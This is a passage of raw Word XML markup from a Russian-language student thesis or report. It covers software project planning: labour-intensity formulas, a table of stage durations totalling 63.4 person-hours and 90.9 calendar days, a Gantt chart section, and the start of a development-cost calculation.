              <w:t>(7)</w:t>
            </w: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oMath>
      <w:r w:rsidRPr="000958EF">
        <w:t xml:space="preserve"> – трудоемкость работ, человек-дней;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="000958EF" w:rsidRDefault="00F870DF"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oMath>
      <w:r w:rsidR="001E4D1C" w:rsidRPr="000958EF">
        <w:t xml:space="preserve"> – численность исполнителей, человек;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRDefault="00F870DF"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rPr>
          <m:t xml:space="preserve"> </m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="001E4D1C" w:rsidRPr="000958EF">
        <w:t xml:space="preserve"> – коэффициент, учитывающий выходные и праздничные д</w:t>
      </w:r>
      <w:r w:rsidR="001E4D1C">
        <w:t xml:space="preserve">ни, определяющийся по формуле </w:t>
      </w:r>
      <w:r w:rsidR="00547371">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="001E4D1C" w:rsidRPr="000958EF">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F870DF" w:rsidP="00547371">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <m:oMathPara>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r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
                  </w:rPr>
                  <m:t>,</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00547371" w:rsidRDefault="00547371" w:rsidP="00547371">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(8)</w:t>
            </w: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oMath>
      <w:r w:rsidRPr="000958EF">
        <w:t>– число календарных дней;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="000958EF" w:rsidRDefault="00F870DF" w:rsidP="00547371">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>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oMath>
      <w:r w:rsidR="00AF064D">
        <w:t>– рабочие дни.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="000958EF" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="000958EF">
        <w:t xml:space="preserve">Для расчёта принимается среднее значение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oMath>
      <w:r w:rsidRPr="000958EF">
        <w:t>= 1,</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="000958EF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="00442024" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="000958EF">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t>приведенным выше фо</w:t>
      </w:r>
      <w:r w:rsidR="00B05C12">
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>мулам, представлены в таблице 17</w:t>
      </w:r>
      <w:r w:rsidR="00531F4B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRDefault="000D5530" w:rsidP="00DE6727">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица 17</w:t>
      </w:r>
      <w:r w:rsidR="001E4D1C" w:rsidRPr="00442024">
        <w:t xml:space="preserve"> – Расчёт трудоёмкости и продолжительности работ по созданию ПО.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="2550"/>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="672"/>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="2532"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E4D1C" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="105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C90951">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C90951">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Продолжительность, календарные дни</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4D1C" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="42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C90951">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C90951">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Т</w:t>
            </w:r>
            <w:r w:rsidRPr="00916E11">
              <w:rPr>
                <w:vertAlign w:val="subscript"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4D1C" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="392"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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Teхнический проект</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4D1C" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>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Постановка задачи</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4</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2.8</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2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4D1C" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="255"/>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Подбор литературы</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1E4D1C" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="273"/>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3</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Сбор и анализ исходных данных</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224959" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="850"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Продолжение таблица 17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="969"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:ind w:left="113" w:right="113"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">
              <w:t>№ работы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00224959" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Наименование</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>стадий и работ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>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 xml:space="preserve">Трудоемкость, чел. часы </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Количество исполнителей, чел.</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Продолжительность, календарные дни</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="126"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pP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224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">
              <w:t>Т</w:t>
            </w:r>
            <w:r w:rsidRPr="00916E11">
              <w:rPr>
                <w:vertAlign w:val="subscript"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="39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существующих решений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224959">
        <w:trPr>
          <w:trHeight w:val="5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Определение стадий, этапов и сроков разработки ПО</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25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Эскизный проект</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="009B1CDA">
        <w:trPr>
          <w:trHeight w:val="65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структуры входных и выходных данных</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81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Выбор критериев эффективности и качества системы</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6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технологии тестирования и отладки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эскизного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116"/>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Технический проект</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="009B1CDA">
        <w:trPr>
          <w:trHeight w:val="38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2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13</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алгоритмического и программного обеспечения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39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интерфейса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77"/>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2A6F86">
        <w:trPr>
          <w:trHeight w:val="392"/>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Рабочий проект</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="002A6F86">
        <w:trPr>
          <w:trHeight w:val="40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программного решения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15</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20</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17</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25.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="002A6F86">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>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Тестирование программного решения</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4.8</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right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">
              <w:t>7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A6F86" w:rsidRPr="00916E11" w:rsidTr="002A6F86">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="002A6F86" w:rsidRPr="00916E11" w:rsidRDefault="002A6F86" w:rsidP="002A6F86">
            <w:pPr>
              <w:pStyle w:val="aff0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Продолжение таблица 17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E812BA" w:rsidRPr="00916E11" w:rsidTr="00E812BA">
        <w:trPr>
          <w:trHeight w:val="654"/>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E812BA" w:rsidRPr="00916E11" w:rsidRDefault="00E812BA" w:rsidP="00C62C5A">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E812BA" w:rsidRPr="00916E11" w:rsidRDefault="00E812BA" w:rsidP="00C62C5A">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E812BA" w:rsidRPr="00916E11" w:rsidRDefault="00E812BA" w:rsidP="00C62C5A">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Продолжительность, календарные дни</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E812BA" w:rsidRPr="00916E11" w:rsidTr="00E812BA">
        <w:trPr>
          <w:trHeight w:val="84"/>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E812BA" w:rsidRPr="00916E11" w:rsidRDefault="00E812BA" w:rsidP="00C62C5A">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E812BA" w:rsidRPr="00916E11" w:rsidRDefault="00E812BA" w:rsidP="00C62C5A">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E812BA" w:rsidRPr="00916E11" w:rsidRDefault="00E812BA" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">
              <w:t>Т</w:t>
            </w:r>
            <w:r w:rsidRPr="00916E11">
              <w:rPr>
                <w:vertAlign w:val="subscript"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00E812BA">
        <w:trPr>
          <w:trHeight w:val="26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Отладка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E812BA">
        <w:trPr>
          <w:trHeight w:val="6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программной документации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5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="1092"/>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рабочего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E812BA">
        <w:trPr>
          <w:trHeight w:val="7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Внедрение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00E812BA">
        <w:trPr>
          <w:trHeight w:val="678"/>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Подготовка и передача системы и технической документации для сдачи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5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00E812BA">
        <w:trPr>
          <w:trHeight w:val="84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данных, полученных в результате эксплуатации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3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00E812BA">
        <w:trPr>
          <w:trHeight w:val="1424"/>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23</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Корректировка технической документации по результатам испытаний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E812BA">
        <w:trPr>
          <w:trHeight w:val="68"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">
              <w:t>Итого</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63.4</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90.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidTr="00224959">
        <w:trPr>
          <w:trHeight w:val="372"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00224959" w:rsidRPr="00916E11" w:rsidRDefault="00224959" w:rsidP="00224959">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001E4D1C" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Судя по результатам расчетов, примерная трудоемкость проекта составит 63,4 человеко-часов, а </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70E8F">
        <w:t>продолжительность проекта</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">90,9 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70E8F">
        <w:t>календарных дней</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70E8F">
        <w:t>при условии последовательного выполнения работ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRDefault="001E4D1C" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc61505568"/>
      <w:r>
        <w:t>Планирование разработки программного обеспечения с построением диаграммы Ганта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="001354A0" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="001354A0">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работы изображаются отрезки (прямоугольники), начало, конец и длина которых соответствуют началу, концу и длительности данной работы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="001354A0" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="001354A0">
        <w:lastRenderedPageBreak/>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Pr="001354A0" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="001354A0">
        <w:t>Диаграмма Ганта разрабатываемого программного продукта, построенная по данным таблиц</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>ы 17</w:t>
      </w:r>
      <w:r w:rsidR="00531F4B" w:rsidRPr="001354A0">
        <w:t xml:space="preserve"> приведена на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00C90951" w:rsidRPr="001354A0">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00064AB5">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00531F4B" w:rsidRPr="001354A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531F4B" w:rsidRDefault="001E4D1C" w:rsidP="00531F4B">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77495168" wp14:editId="52C4F0DA">
            <wp:extent cx="6028660" cy="45424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28660" cy="4542457"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRDefault="00531F4B" w:rsidP="00C90951">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Диаграмма Ганта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="001E785D" w:rsidRDefault="001E785D" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc61505569"/>
      <w:r>
        <w:t>Расчет экономической эффективности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="008E1F82" w:rsidRDefault="001E785D" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>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w:t>
      </w:r>
      <w:r w:rsidR="00547371">
        <w:t>дукта можно найти по формуле 9</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E785D">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1"/>
        <w:gridCol w:w="543"/>
      </w:tblGrid>
      <w:tr w:rsidR="00547371" w:rsidTr="00AF064D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00547371" w:rsidRDefault="00F870DF" w:rsidP="00547371">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="708"/>
              <w:jc w:val="right"/>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547371" w:rsidRPr="008E1F82">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> ,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00547371" w:rsidRDefault="00547371" w:rsidP="00547371">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001E785D" w:rsidRPr="001354A0" w:rsidRDefault="001E785D" w:rsidP="00547371">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001354A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>где</w:t>
      </w:r>
      <w:r w:rsidRPr="001354A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:sSubPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
              </w:rPr>
            </m:ctrlPr>
          </m:sSubPr>
          <m:e>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>С</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>разр</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r w:rsidRPr="001354A0">
        <w:t>– стоимость разработки программного средства;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="001354A0" w:rsidRDefault="00F870DF" w:rsidP="00547371">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>
        <m:sSub>
          <m:sSubPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
              </w:rPr>
            </m:ctrlPr>
          </m:sSubPr>
          <m:e>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:hint="eastAsia"/>
              </w:rPr>
              <m:t>С</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>мат</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r w:rsidR="001E785D" w:rsidRPr="001354A0">
        <w:t xml:space="preserve"> – затраты на используемые материалы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="001354A0" w:rsidRDefault="00F870DF"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AF064D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E785D" w:rsidRPr="001354A0">
        <w:t>– заработная плата исполнителей;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRDefault="00F870DF"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AF064D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E785D" w:rsidRPr="001354A0">
        <w:t>– дополнительная заработная плата исполнителей (в среднем берется около 15% от Сосн);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00547371" w:rsidRPr="001354A0" w:rsidRDefault="00F870DF"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oMath>
      <w:r w:rsidR="00AF064D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00547371" w:rsidRPr="001354A0">
        <w:t>– затраты машинного времени</w:t>
      </w:r>
      <w:r w:rsidR="00AF064D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="001354A0" w:rsidRDefault="00F870DF"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oMath>
      <w:r w:rsidR="00AF064D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E785D" w:rsidRPr="001354A0">
        <w:t xml:space="preserve">–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 xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRDefault="00F870DF"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oMath>
      <w:r w:rsidR="00AF064D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E785D" w:rsidRPr="001354A0">
        <w:t xml:space="preserve">– накладные расходы (уборку, ремонт, и др., берется в размере около 60%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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF064D" w:rsidRPr="00AF064D" w:rsidRDefault="00F870DF"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AF064D">
        <w:t xml:space="preserve"> – прочие раходы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRPr="001E785D" w:rsidRDefault="001E785D" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc61505570"/>
      <w:r>
        <w:t>Расчет затрат на основные материалы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="001E785D" w:rsidRDefault="001E785D" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">К этой статье </w:t>
      </w:r>
      <w:r w:rsidRPr="0091728F">
        <w:t>расходов относят затраты на</w:t>
      </w:r>
      <w:r>
